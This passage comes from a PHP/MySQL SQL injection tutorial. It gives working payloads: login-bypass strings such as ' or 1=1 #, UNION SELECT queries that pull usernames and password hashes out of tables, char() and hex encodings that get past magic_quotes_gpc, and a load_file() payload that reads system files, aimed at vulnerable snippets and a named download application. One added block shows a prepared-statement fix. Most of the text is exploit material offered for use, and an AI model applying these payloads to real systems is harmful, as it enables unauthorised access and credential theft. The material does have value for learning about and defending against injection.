Let's build the injection statement. Enter the following in the input box:
a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor#
The SQL statement becomes:
SELECT * from alphadb where title like '%a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor#%'
See, out it comes, haha, everything is under control.
C: Let's look at the injection attacks possible at each kind of injection point.
1. First, the back-end (admin) login.
Code first:
login.php
<?php
.......
$query = "SELECT * from alphaauthor where username='"
    . $HTTP_POST_VARS["username"] . "' and password='"
    . $HTTP_POST_VARS["password"] . "'";
$result = mysql_query($query);
$data = mysql_fetch_array($result);
if ($data)
{
    echo "Back-end login successful";
}
else
{
    echo "Please log in again";
    exit;
}
.........
?>
The username and password are put straight into the SQL statement without any processing.
See how we get around it?
The classic one:
Enter in both the username and password boxes:
' or ''='
The SQL statement becomes:
SELECT * from alphaauthor where username='' or ''='' and password='' or ''=''
This makes the WHERE condition true, so $data is non-empty and we have logged in successfully.
There are other bypass methods; the principle is the same: find a way to make $data come back true.
We can use any of the following:
1.
Enter ' or 'a'='a in both the username and password fields.
The SQL becomes:
SELECT * from alphaauthor where username='' or 'a'='a' and password='' or 'a'='a'
2.
Enter ' or 1=1 and ''=' in both fields.
The SQL becomes:
SELECT * from alphaauthor where username='' or 1=1 and ''='' and password='' or 1=1 and ''=''
Or enter ' or 2>1 and ''=' in both fields.
The SQL becomes:
SELECT * from alphaauthor where username='' or 2>1 and ''='' and password='' or 2>1 and ''=''
3.
Enter ' or 1=1 # as the username; the password can be anything.
The SQL becomes:
SELECT * from alphaauthor where username='' or 1=1 # and password='anything'
The part after # is commented out, so of course the result is true.
4.
Assuming the admin's id=1, you can also
enter ' or id=1 # as the username; the password can be anything.
The SQL becomes:
SELECT * from alphaauthor where username='' or id=1 # and password='anything'
What do you think? Logged straight in!
As the saying goes, the only limit is what you can think of.
There are more ways to construct these, left for you to think about after class.
2. The second common injection point is where data is displayed on the front end.
This has been covered several times already, including the numeric and string types, so I won't repeat it here.
Just one example as a review:
The "Blue Sea Tide Sound" download station v2.0.3 Lite has an injection flaw; the code is not listed here.
Look directly at the result:
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
Look, we got what we wanted again:
Username: alpha
Password: a long string (the hash).
Why did we put password in the 3rd field and username in the 5th? As mentioned above, we guessed that fields 3 and 5 are string type, and the username and password fields we want to display must be of the same type, so we placed them there.
Why 18 fields? Remember from the introduction to UNION SELECT that the SELECTs before and after the UNION must have the same number of columns; by increasing the number of columns in our SELECT we worked out that 18 are needed, and only then does the content of the UNION SELECT display normally.
3. Other places, such as data modification and user registration, are mainly user-level functions.
We talked about UPDATE and INSERT above; since they are less common they are not discussed further here, although there are some advanced techniques for exploiting UPDATE and INSERT.
Two: Injection attacks when magic_quotes_gpc=on
When magic_quotes_gpc=on, every ' (single quote), " (double quote), \ (backslash) and NUL character in submitted variables is automatically escaped with a backslash.
This defeats string-type injection, so we can only inject into numeric-type parameters that are not processed with intval(). We have already discussed the numeric type at length: because numeric values are not enclosed in single quotes there is nothing to bypass, and we can inject directly.
1. If the parameter is a string, it has to be written in a form that contains no quotes.
Here we first use some string processing functions.
There are many string functions; here we mainly cover the following few. For details see the MySQL Chinese reference manual, section 7.4.10.
char(): interprets its arguments as integers and returns a string made up of the characters with those ASCII codes.
Of course, you can also use hexadecimal in place of the string; the method is to prefix the hex with 0x. See the example below.
login.php
<?php
......
$query = "SELECT * from " . $art_system_db_table['user'] . "
    where username=$username and password='" . $pw . "'";
......
?>
Let's say we know the back-end username is alpha.
Converted to ASCII codes it is char(97,108,112,104,97).
Converted to hex it is 0x616c706861.
OK, just type this in the browser:
http://localhost/site/admin/login.php?username=char(97,108,112,104,97)%23
The SQL statement becomes:
SELECT * from alphaauthor where username=char(97,108,112,104,97) # and password=''
As we expected, it executes smoothly and we get what we wanted.
Of course, we can also construct
http://localhost/site/admin/login.php?username=0x616c706861%23
The SQL statement becomes:
SELECT * from alphaauthor where username=0x616c706861 # and password=''
Once again we win. What a sense of accomplishment.
Maybe you'll ask whether we can put the # inside char().
Actually char(97,108,112,104,97) equals 'alpha'.
Note that this is the quoted string 'alpha'.
We know that in MySQL, if you execute
mysql> SELECT * from dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column 'alpha' in 'where clause'
it returns an error, because MySQL treats the bare alpha as an identifier rather than a string. So we have to put quotes around alpha,
as follows:
mysql> SELECT * from dl_users where username='alpha';
This is the correct form.
If you put the # inside char(), the result is 'alpha#'.
Put into the SQL statement:
SELECT * from dl_users where username='alpha#';
Of course nothing comes back, because there is no user called alpha#.
OK, let's look at the following example.
display.php
<?php
......
$query = "SELECT * from " . $art_system_db_table['article'] . " where type=$type";
......
?>
The code displays content according to its type; $type is not filtered in any way, and it is not enclosed in quotes in the program.
Assume the type contains the class xiaohua. Converted with char(), xiaohua is
char(120,105,97,111,104,117,97)
We construct
http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
Put into the SQL statement this becomes:
SELECT * from " . $art_system_db_table['article'] . " where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
Look, our username and password still come out! No screenshot, just imagine it :P
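As an added example (not code from the original tutorial or from the application it discusses), here are the login.php and display.php queries above rewritten with PDO prepared statements, which is the fix for every bypass in this section and in the magic_quotes_gpc section: the input is bound as data, so neither quotes nor char()/0x literals can alter the query's structure. The DSN, the credentials, the table names alphaauthor and article, and storing passwords as password_hash() hashes are assumptions.

```php
<?php
// Added example, not from the original tutorial: login.php and display.php
// rewritten with PDO prepared statements. Table and column names follow
// the tutorial; the DSN and credentials are placeholders.
$pdo = new PDO(
    'mysql:host=localhost;dbname=alphadb;charset=utf8mb4',
    'app_user',      // placeholder: a low-privilege account (no FILE privilege)
    'app_password',  // placeholder
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // server-side prepare, not client-side quoting
    ]
);

// login.php, hardened. The username is bound as a parameter, so
// ' or 1=1 #, char(97,108,112,104,97) and 0x616c706861 are all compared as
// literal strings; none of them reaches the SQL parser as syntax.
function login(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare(
        'SELECT password FROM alphaauthor WHERE username = :u LIMIT 1'
    );
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Assumes password is stored as a password_hash() hash rather than the
    // plaintext the tutorial's code compares inside the SQL.
    return $row !== false && password_verify($password, $row['password']);
}

// display.php, hardened. $type was the unquoted parameter that
// magic_quotes_gpc could not protect; bound as a parameter, the driver
// does the quoting, so "char(...) and 1=2 union select ..." is just a
// type name that matches no row.
function articlesByType(PDO $pdo, string $type): array
{
    $stmt = $pdo->prepare('SELECT * FROM article WHERE type = :t');
    $stmt->execute([':t' => $type]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The tutorial's bypass inputs now fail: login is refused and no rows match.
var_dump(login($pdo, "' or 1=1 #", 'anything'));
var_dump(articlesByType(
    $pdo,
    'char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor'
));
```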
2. Some people may ask: when magic_quotes_gpc=on, can the powerful load_file() still be used?
This is exactly the problem we are going to tackle. The format of load_file() is load_file('file path').
We find that simply converting 'file path' with char() does the job. Try it!
load_file('c:/boot.ini') becomes
load_file(char(99,58,47,98,111,111,116,46,105,110,105))
(Figure 22)
Put it into a concrete injection:
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Look, we can see the contents of boot.ini.
Unfortunately INTO OUTFILE cannot be bypassed this way (its file name must be a literal string, not an expression), otherwise it would be even more fun. But there is still one place where SELECT * from table INTO OUTFILE can be used. (A teaser for now; it is explained below.)